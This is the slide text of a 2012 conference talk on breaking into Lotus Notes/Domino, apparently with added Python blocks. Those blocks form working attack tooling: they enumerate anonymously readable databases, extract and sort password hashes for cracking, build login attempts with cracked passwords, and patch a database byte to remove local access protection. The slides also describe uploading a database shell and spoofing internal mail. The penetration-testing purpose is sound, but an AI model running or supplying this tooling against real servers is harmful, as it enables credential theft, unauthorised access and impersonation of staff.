
Page 1: Toppling Domino - 44CON 2012

© 2012 SecQuest Information Security Ltd.

44Con 2012: Toppling Domino

Testing security in a Lotus Notes environment

Written & Presented by Darren Fuller

SecQuest Information Security Ltd.

Page 2: About this Presentation

44Con: London, September 2012

This presentation was originally given at 44Con 2012 in London and had a number of interactive demos which obviously cannot be included.

If you or your company would like further information about Domino security or to arrange a re-run of this talk on your premises, please contact us.

https://www.secquest.co.uk

Tel: 0845 19 31337

Page 3: Who Am I?

Darren Fuller

Lotus PCLP*

Security Consultant

Ex IBM Notes developer

Ex IBM EMEA X-Force

Run a company called SecQuest

Been using Notes since V3 on IBM OS/2

* Domino R5

Page 4: What I’m Talking About Today

“Although there have been a number of technical papers published by different researchers covering Lotus Notes/Domino security, it is rarely covered by the wider pen testing community.

In this presentation I’ll aim to give a general overview of Domino security and demonstrate ways of breaking in. This will cover security issues from the point of view of the web server, native Domino server and demonstrate some tricks you can use from the client side of things.”

Page 5: Typical!

Nothing about Notes/Domino for a while, then William Dawson talked about it at BSides Las Vegas this year!

An interesting talk about Domino hashes, which we’ll cover in a bit of detail later.

Link to talks:

http://www.irongeek.com/i.php?page=videos/bsideslasvegas2012/mainlist

Page 6: Used By…

More than half of Fortune 100 companies & more

Page 7: Lotus Notes/Domino: History

Created by Ray Ozzie/Iris Associates

V1 shipped in 1989

Included public key cryptography

3 major editions available in the early days

V8.5.4 is currently in beta

Page 8: Crypto Background Information

US Edition used 64 bit keys

International keys restricted to 40 bits due to US export rules before 1997

Deal with US .gov to allow 64 bit international keys after 1997, providing 24 bits of each key were recoverable by the US government (the “differential workfactor” scheme: 64 bit keys against everyone else, effectively 40 bit against the US government)

France didn’t like this! A French edition was made with 40 bit encryption keys

These days 128 and 256 bit AES can be used

Page 9: Security Overview

ID Files

Database ACL (Access Control List)

Execution Control List (ECL)

NAB Groups (groups in the Domino Directory, names.nsf)

Page 10: Security Overview – Encryption Layers

Database Encryption

Document Encryption

Field Encryption

Transport Layer Encryption

Page 11: C’mon! We’re h4X0rs..

Can we whack it?

Page 12: Yes we Can!

Examples given in this presentation are based on “real world” tests.

These techniques have been used a number of times to compromise various client sites.

Obviously root is nice, but the data is the thing to go for: the right Notes user will give you the keys to the kingdom!

Page 13: Breaking In Externally – What to look for

names.nsf database with anonymous access

domlog.nsf with anonymous access

webadmin.nsf (you’ll be lucky!)

Page 14: Checking out the /hacker Domain

Anonymous access to domlog.nsf (the web server log) can give you a session ID; Domino sessions default to a 30 minute expiry, so a recently logged one may still be live

Page 15: NAB Access!

Page 16: Because..

The admins have messed up and granted the “Anonymous” ACL entry “Reader” access
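The external checks from the last few slides (names.nsf, domlog.nsf, webadmin.nsf reachable anonymously) boil down to requesting each database and reading Domino’s answer. The following is an added example, not code from the talk: it classifies responses the way you would by hand. With session-based authentication Domino answers an unauthorised request with a 200 carrying the login form or a 302 to ...?Login; with basic authentication it answers 401; a database that does not exist is a 404. The HTTP layer is a pluggable fetch callable so the block runs offline against constructed responses; the fake server below, the database list beyond the three the talk names, and the hostname are all my assumptions.

```python
"""Check which well-known Domino databases answer an anonymous request.

Added example, not from the talk. Offline: the HTTP layer is a pluggable
`fetch(url) -> (status, headers, body)` callable; a fake one built from a
constructed set of responses is used below. Swap in a real one (e.g. urllib)
only against a server you are authorised to test.
"""
from urllib.parse import urljoin

# The three databases the talk says to look for, plus a few more that are
# commonly present on a Domino web server (the extra names are my addition).
DEFAULT_TARGETS = [
    "names.nsf",     # Domino Directory (NAB): people, groups, HTTPPassword fields
    "domlog.nsf",    # web server log: URLs, user names, session ids
    "webadmin.nsf",  # Domino Web Administrator: server console access
    "catalog.nsf",   # database catalog with ACL summaries
    "log.nsf",       # server log
    "domcfg.nsf",    # web server configuration (custom login form mappings)
]

# Strings that mark Domino's session-based login form in a 200 body (heuristic).
LOGIN_MARKERS = ("?Login", "?login", 'name="Username"', 'name="Password"')


def classify(status, headers, body):
    """Map a Domino response to: anonymous, auth-required, missing or other."""
    location = headers.get("Location", "")
    if status == 401 or (status in (301, 302) and "?Login" in location):
        return "auth-required"
    if status == 200 and any(m in body for m in LOGIN_MARKERS):
        return "auth-required"
    if status == 404:
        return "missing"
    if status == 200:
        return "anonymous"
    return "other"


def enumerate_databases(base_url, fetch, targets=DEFAULT_TARGETS):
    """Return {database: classification} for each target under base_url."""
    results = {}
    for db in targets:
        status, headers, body = fetch(urljoin(base_url, db))
        results[db] = classify(status, headers, body)
    return results


# --- constructed responses standing in for a real server -------------------
FAKE_SERVER = {
    "names.nsf": (200, {}, "<html><title>Domino Directory</title> ...views... </html>"),
    "domlog.nsf": (200, {}, "<html><title>Domino Web Server Log</title> ... </html>"),
    "webadmin.nsf": (302, {"Location": "/names.nsf?Login&RedirectTo=/webadmin.nsf"}, ""),
    "catalog.nsf": (200, {}, '<form method="post" action="/names.nsf?Login">'
                             '<input name="Username"><input name="Password"></form>'),
    "log.nsf": (401, {"WWW-Authenticate": 'Basic realm="/log.nsf"'}, ""),
    "domcfg.nsf": (404, {}, "HTTP Web Server: Lotus Notes Exception - File does not exist"),
}


def fake_fetch(url):
    """Offline stand-in for an HTTP GET: answers from FAKE_SERVER."""
    db = url.rsplit("/", 1)[-1]
    return FAKE_SERVER.get(db, (404, {}, ""))


if __name__ == "__main__":
    for db, verdict in enumerate_databases("https://domino.example/", fake_fetch).items():
        print(f"{db:14} {verdict}")
```

The 200-with-login-form case is the one that trips people up: a naive status-code check would report catalog.nsf as open when it is not. Conversely, an anonymously readable names.nsf is what makes the next slides possible.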

Page 17: HTTPPassword in Document Source

Vulnerability documented in 2005 (CVE-2005-2428: the HTML of a person document in names.nsf carries the HTTPPassword hash as a hidden input)

Still overlooked by a lot of admins

Page 18: HTTPPassword in Document Source

<input name="FullName" type="hidden" value="MilexaCrozzd/hacker; Milexa Crozzd">

<input name="ShortName" type="hidden" value="milexa">

<input name="HTTPPassword" type="hidden" value="(GbZjMLBTiHzBXtS0TcIl)">

<input name="dspHTTPPassword" type="hidden" value="(GbZjMLBTiHzBXtS0TcIl)">

Metasploit can automate hash gathering (auxiliary/scanner/lotus/lotus_domino_hashes)

Page 19: Cracking Passwords

Grab password hashes from the document source

Domino has two types of password hashes for internet passwords: “normal” (unsalted, 32 hex characters, the R4/R5 format) and “more secure” (salted, 22 characters in parentheses starting “(G”, the form shown on the previous slide)

Use JTR with Jumbo Patch

“normal” = “lotus5”

“more secure” = “dominosec”
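Slides 18 and 19 together describe a small pipeline: pull the hidden FullName/ShortName/HTTPPassword inputs out of each person document, work out which of the two hash layouts you have, and feed John the Ripper the right format. The block below is an added example, not the talk’s or Metasploit’s code, that does exactly that for a batch of documents. The sample HTML is constructed from the pattern on slide 18 and the hash values in it are made up (they will not crack to anything). The hashcat mode numbers (8600 for the normal hash, 8700 for the more secure hash) and the third, Domino 8 layout (JtR “dominosec8” / hashcat 9100, matched loosely) are my additions and are not covered by the talk.

```python
"""Pull FullName/ShortName/HTTPPassword out of Domino person-document HTML
and write them out in the form John the Ripper (jumbo) expects.

Added example, not code from the talk or from Metasploit. The HTML below is
constructed from the hidden-input pattern on the slide; hash values are made
up and will not crack.
"""
import re
from html.parser import HTMLParser


class HiddenInputs(HTMLParser):
    """Collect name=value of every <input type="hidden"> in a document."""

    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        a = dict(attrs)                      # HTMLParser already unescapes values
        if a.get("type", "").lower() == "hidden" and a.get("name"):
            self.fields[a["name"]] = a.get("value") or ""


# Hash layouts and the JtR format / hashcat mode that takes each:
#   lotus5      32 hex chars                "normal" internet password (R4/R5)
#   dominosec   "(G" + 19 chars + ")"        "more secure" salted hash (R6+)
#   dominosec8  "(H" + ~48 chars + ")"       Domino 8 layout (my addition, loose match)
HASH_KINDS = [
    ("lotus5",     "8600", re.compile(r"^[0-9A-Fa-f]{32}$")),
    ("dominosec",  "8700", re.compile(r"^\(G[A-Za-z0-9+/]{19}\)$")),
    ("dominosec8", "9100", re.compile(r"^\(H[A-Za-z0-9+/]{40,60}\)$")),
]


def classify_hash(h):
    """Return (jtr_format, hashcat_mode), or (None, None) for an unknown layout."""
    for fmt, mode, rx in HASH_KINDS:
        if rx.match(h):
            return fmt, mode
    return None, None


def extract_person(html):
    """Return {'user', 'fullname', 'hash', 'format', 'hashcat'} or None.

    ShortName is used as the login name when present, otherwise the first
    entry of FullName (the hierarchical name). Documents with an empty
    HTTPPassword (Notes-only users) yield None.
    """
    p = HiddenInputs()
    p.feed(html)
    f = p.fields
    h = f.get("HTTPPassword") or f.get("dspHTTPPassword")
    if not h:
        return None
    fullname = f.get("FullName", "").split(";")[0].strip()
    user = f.get("ShortName") or fullname
    fmt, mode = classify_hash(h)
    return {"user": user, "fullname": fullname, "hash": h, "format": fmt, "hashcat": mode}


def jtr_lines(records):
    """Group records by JtR format: {format: ['user:hash', ...]}.

    One file per format, so `john --format=<fmt> <fmt>.txt` sees a single type.
    """
    out = {}
    for r in records:
        if r and r["format"]:
            out.setdefault(r["format"], []).append(f'{r["user"]}:{r["hash"]}')
    return out


# Constructed person documents in the layout the slide shows.
SAMPLE_DOCS = [
    '<input name="FullName" type="hidden" value="MilexaCrozzd/hacker; Milexa Crozzd">'
    '<input name="ShortName" type="hidden" value="milexa">'
    '<input name="HTTPPassword" type="hidden" value="(GbZjMLBTiHzBXtS0TcIl)">'
    '<input name="dspHTTPPassword" type="hidden" value="(GbZjMLBTiHzBXtS0TcIl)">',
    '<input name="FullName" type="hidden" value="Joe King/hacker; Joe King">'
    '<input name="ShortName" type="hidden" value="jking">'
    '<input name="HTTPPassword" type="hidden" value="A1B2C3D4E5F60718293A4B5C6D7E8F90">',
    '<input name="FullName" type="hidden" value="Svc Account/hacker">'
    '<input name="HTTPPassword" type="hidden" value="">',
]

if __name__ == "__main__":
    recs = [extract_person(d) for d in SAMPLE_DOCS]
    for fmt, lines in jtr_lines(recs).items():
        print(f"# john --format={fmt} {fmt}.txt")
        print("\n".join(lines))
```

Mixing the two layouts in one input file is the usual mistake: john will pick one format and silently skip the rest, which is why the output is grouped per format.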

Page 20: Cracking Passwords: results

Page 21: Targeting “Interesting” Users

Once you have cracked some passwords you should be able to authenticate and access catalog.nsf

If “Internet authentication” is set to “Fewer name variations with higher security” you need to use the full hierarchical username (e.g. Joe King/hacker) rather than just the common or short name

catalog.nsf contains a list of all databases on the server + access control information

The “By Name” view will give you a list of databases your user can access
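Turning a cracked hash into a session means getting the login name right under the server’s “Internet authentication” setting and then recognising success. This added example (not from the talk) generates the name variants to try, most specific first, builds the form body Domino’s session-based login expects (Username and Password posted to <db>?Login) and pulls the DomAuthSessId cookie out of a response. It runs offline: the response it parses is constructed, and the password, redirect target and the example names are assumptions. The canonical/abbreviated conversion is the standard Domino naming rule (CN=Joe King/O=hacker versus Joe King/hacker).

```python
"""Build the login attempts for a cracked Domino web password and recognise
a successful session-based login.

Added example, not from the talk. Offline: it produces request bodies and
interprets a constructed response. Domino's form login posts Username and
Password to <db>?Login and sets a DomAuthSessId cookie on success.
"""
import re
from urllib.parse import urlencode


def canonical_to_abbreviated(name):
    """'CN=Joe King/OU=Sales/O=hacker' -> 'Joe King/Sales/hacker'.
    Already-abbreviated names pass through unchanged."""
    return "/".join(part.split("=", 1)[-1] for part in name.split("/"))


def abbreviated_to_canonical(name):
    """'Joe King/Sales/hacker' -> 'CN=Joe King/OU=Sales/O=hacker'."""
    parts = name.split("/")
    if "=" in name or len(parts) < 2:
        return name
    labels = ["CN"] + ["OU"] * (len(parts) - 2) + ["O"]
    return "/".join(f"{lbl}={p}" for lbl, p in zip(labels, parts))


def name_variants(fullname, shortname=None, internet_address=None, more_variations=False):
    """Login names to try for one person document, most specific first.

    Under "Fewer name variations with higher security" the talk found that the
    full hierarchical name is what works; under "More name variations with
    lower security" common, first and last names are accepted as well.
    """
    abbr = canonical_to_abbreviated(fullname)
    common = abbr.split("/")[0]
    out = [abbr, abbreviated_to_canonical(abbr)]
    if shortname:
        out.append(shortname)
    if internet_address:
        out.append(internet_address)
    if more_variations:
        out.append(common)
        out.extend(common.split())          # first name, last name
    uniq = []
    for n in out:                           # de-duplicate, keep order
        if n not in uniq:
            uniq.append(n)
    return uniq


def login_request(db, username, password, redirect_to="/catalog.nsf"):
    """(path, form body) for a Domino session-based login POST."""
    body = urlencode({"Username": username, "Password": password, "RedirectTo": redirect_to})
    return f"/{db}?Login", body


def session_from_response(status, headers):
    """Return the DomAuthSessId value if the response carries one, else None.

    Success is a redirect to RedirectTo with Set-Cookie: DomAuthSessId=...;
    a failed login re-serves the login page and sets no session cookie.
    """
    for k, v in headers:
        if k.lower() == "set-cookie":
            m = re.match(r"DomAuthSessId=([^;]+)", v)
            if m:
                return m.group(1)
    return None


if __name__ == "__main__":
    for n in name_variants("CN=Joe King/O=hacker", "jking", more_variations=True):
        path, body = login_request("names.nsf", n, "Winter2012")   # assumed password
        print(f"POST {path}  {body}")
    # constructed success response
    hdrs = [("Location", "/catalog.nsf"), ("Set-Cookie", "DomAuthSessId=ABCDEF0123; path=/")]
    print("session:", session_from_response(302, hdrs))
```

Keep the attempt count per account low: Domino can lock out internet passwords after repeated failures, and every try lands in domlog.nsf, the same log you may have just been reading anonymously.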

Page 22: Targeting “Interesting” Users

Page 23: Access Control List Info

Page 24: Check group members in names.nsf

JTR popped this one earlier!

Page 25: Getting More Access – Running Commands

webadmin.nsf allows an administrator to run server commands.

Page 26: Getting More Access

You can run O/S commands using the “load” console command (the program runs as the Domino server user), but you can’t see the results when using Quick Console.

For some reason writing output to a web accessible directory didn’t work on Linux

Solution: upload a Notes database shell!

Page 27: Introducing shell.nsf aka D99Shell

You may get a certificate error after uploading..

Page 28: D99Shell in action!

Page 29: Also works on Windows servers

Page 30: Demo: Breaking In!

Oh Noez! U R demoin dis live!?!

Page 31: Breaking in from the Inside - Objectives

Find ID files on the network

Crack passwords

Get in to the NAB on the server

Find ID files with higher levels of access

Pw0nage!

Page 32: Are Employees the Biggest Threat?

“Many breaches of security are done by insiders” - Katherine Spanbauer, Domino senior product manager

Page 33: Gaining A Toehold

Since R5 you need an ID file to access the client

The ID file needs to be valid and not in a “deny access” group in the NAB.

Shared directories FTW!

Page 34: Gaining A Toehold

It used to be hard to crack native Notes passwords!

There are a number of products available to crack ID file passwords

Huge thanks to Nataly at Passware* for the software being used in the following demo..

* http://www.lostpassword.com

Page 35: Demo: Notes ID Password Cracking

I can haz beerz after, right?

Page 36: We’re going after the payroll

Our freshly cracked ID file gives catalog.nsf & names.nsf access

Page 37: Check the NAB (names.nsf) for group members

Oops!

Page 38: The result..

Page 39: Client-side Tricks

Spoofing mail..

Removing local access restrictions

LotusScript can access the Windows API!

Declare Function GetClipboardData Lib "User32" (Byval wFormat As Long) As Long

Page 40: Mail spoofing; getting a payrise!

SMTP mail can be easily spoofed using telnet, but the document properties of the received mail (the SMTP routing items) are a dead giveaway

Page 41: The Spoof Memo Form

This is all that is required:

Page 42: The result

Create a new mail using the evil form and copy/paste it into the mail.box database on the spoofed user’s server

Looks Good..

The only giveaway..

Page 43: Local Access Protection

Lotus Notes has an ACL setting to “Enforce a consistent Access Control List across all replicas of this database”

Opening a “protected” database locally gives an access error instead of the unrestricted local access you get when the setting is off

Page 44: I Can’t Access It Locally Eh!

There are companies out there selling various unlock solutions

Prices for software range from $49 to $657!!

I’ve tested a few versions of these “life saving” products..

One of them changed 4 bytes, another changed 6!

Page 45: I Can’t Access It Locally Eh!

I mentioned to colleagues @ IBM in 2004 that you could change 1 byte to remove protection

These apps are doing 75% too much work!

Sorry guys, the secret’s out:

Changing the byte at offset 0x000002C4 from 0x20 to 0x00 could save $700!

Page 46: Tool release

Local Access Protection Deprotector And No Cash Expected

Page 47: Tool release: lapdance

Local Access Protection Deprotector And No Cash Expected (lapdance.pl)

Written in Perl (badly), gives some info about the database and can add and remove protection

Available from https://www.secquest.co.uk/tools/lapdance.pl

Page 48: Tool release: lapdance

Local Access Protection Deprotector And No Cash Expected (lapdance.pl)

Support for ODS versions 16, 17, 20, 41, 43, 48 and 51 (i.e. everything from V2 to V8.5)

Will display database protection and encryption flags information

Can add and remove local access protection
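The one-byte edit from slide 45 is simple enough to show in full. The block below is an added example and is not lapdance.pl: it reads the byte at offset 0x2C4, reports whether the 0x20 value the talk identifies is present, and turns protection off or back on. The talk documents only that offset and that value, so the ODS version field and the meaning of any other bits in that byte are not touched here: the code clears or sets just the 0x20 bit, which is the same edit the talk describes when the byte is exactly 0x20. The 1 KiB “header” it runs on is a constructed stand-in for a real .nsf, not a genuine database image. Work on a copy, with the database closed in the Notes client.

```python
"""Read and toggle the local access protection byte ("Enforce consistent ACL")
in an NSF header, at the offset and value given in the talk.

Added example, not lapdance.pl. Only the 0x20 bit at 0x2C4 is changed; the
rest of the byte is left as found. SAMPLE_PROTECTED is a constructed stand-in
for a real .nsf header.
"""
import sys

FLAG_OFFSET = 0x2C4     # offset given on slide 45
FLAG_BIT = 0x20         # value given on slide 45 (0x20 = protected, 0x00 = not)


def _check_length(data):
    if len(data) <= FLAG_OFFSET:
        raise ValueError("file too short to contain the NSF header flag byte")


def is_protected(data):
    """True if the 0x20 bit is set at offset 0x2C4 of an NSF image."""
    _check_length(data)
    return bool(data[FLAG_OFFSET] & FLAG_BIT)


def set_protection(data, enable):
    """Return a copy of `data` with local access protection turned on or off."""
    _check_length(data)
    out = bytearray(data)
    if enable:
        out[FLAG_OFFSET] |= FLAG_BIT
    else:
        out[FLAG_OFFSET] &= ~FLAG_BIT & 0xFF      # clear only the 0x20 bit
    return bytes(out)


def patch_file(path, enable, backup=True):
    """Patch an .nsf in place (writing path + '.bak' first). Returns (before, after)."""
    with open(path, "rb") as f:
        data = f.read()
    before = is_protected(data)
    if backup:
        with open(path + ".bak", "wb") as f:
            f.write(data)
    patched = set_protection(data, enable)
    with open(path, "wb") as f:
        f.write(patched)
    return before, is_protected(patched)


# Constructed header image: 1 KiB of zeros with the protection byte set, as the
# talk says a database with "Enforce consistent ACL" ticked has it.
_buf = bytearray(1024)
_buf[FLAG_OFFSET] = 0x20
SAMPLE_PROTECTED = bytes(_buf)

if __name__ == "__main__":
    if len(sys.argv) == 3 and sys.argv[1] in ("on", "off"):
        print(patch_file(sys.argv[2], sys.argv[1] == "on"))
    else:
        print("sample protected:", is_protected(SAMPLE_PROTECTED))
        print("after clearing:  ", is_protected(set_protection(SAMPLE_PROTECTED, False)))
```

Usage on a real file is `python lap.py off payroll.nsf` (and `on` to restore), after which the database opens locally without the error from slide 43. The point for defenders is the one the talk makes: “Enforce consistent ACL” is a client-side flag in the file, not cryptography, and local database encryption is what actually protects a copied .nsf.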

Page 49: Demo: Removing Database Protection!

Ohalp! Prayrz 2 Ceilin Cat dat dis workz!

Page 50: To Finish..

“In this presentation I’ll aim to give a general overview of Domino security and demonstrate ways of breaking in. This will cover security issues from the point of view of the web server, native Domino server and demonstrate some tricks you can use from the client side of things.”

Page 51: Contact

@UKFully

@SecQuest